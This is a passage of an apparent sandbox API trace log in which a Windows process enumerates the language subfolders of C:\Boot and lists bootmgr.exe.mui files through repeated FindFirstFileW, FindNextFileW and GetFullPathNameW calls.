ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0154.542] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.542] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0154.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0154.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.543] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ", lpFilePart=0x0) returned 0xd [0154.543] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\", lpFilePart=0x0) returned 0xe [0154.543] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.544] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.544] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.544] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.544] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.544] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ", lpFilePart=0x0) returned 0xd [0154.544] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\", lpFilePart=0x0) returned 0xe [0154.544] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.545] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.545] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.545] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.545] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.545] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.545] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK", lpFilePart=0x0) returned 0xd [0154.545] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\", lpFilePart=0x0) returned 0xe [0154.545] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.546] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.546] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.546] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.546] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.546] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK", lpFilePart=0x0) returned 0xd [0154.546] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\", lpFilePart=0x0) returned 0xe [0154.546] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.546] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.547] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.547] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.547] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.547] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE", lpFilePart=0x0) returned 0xd [0154.547] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\", lpFilePart=0x0) returned 0xe [0154.547] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.548] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.548] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.548] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.548] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.549] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE", lpFilePart=0x0) returned 0xd [0154.549] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\", lpFilePart=0x0) returned 0xe [0154.549] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.549] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.549] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.549] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.549] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.550] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR", lpFilePart=0x0) returned 0xd [0154.550] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\", lpFilePart=0x0) returned 0xe [0154.550] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.550] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.550] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.550] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.550] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.550] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR", lpFilePart=0x0) returned 0xd [0154.551] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\", lpFilePart=0x0) returned 0xe [0154.551] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.551] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.551] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.551] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.551] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.551] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US", lpFilePart=0x0) returned 0xd [0154.551] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\", lpFilePart=0x0) returned 0xe [0154.551] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.552] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: 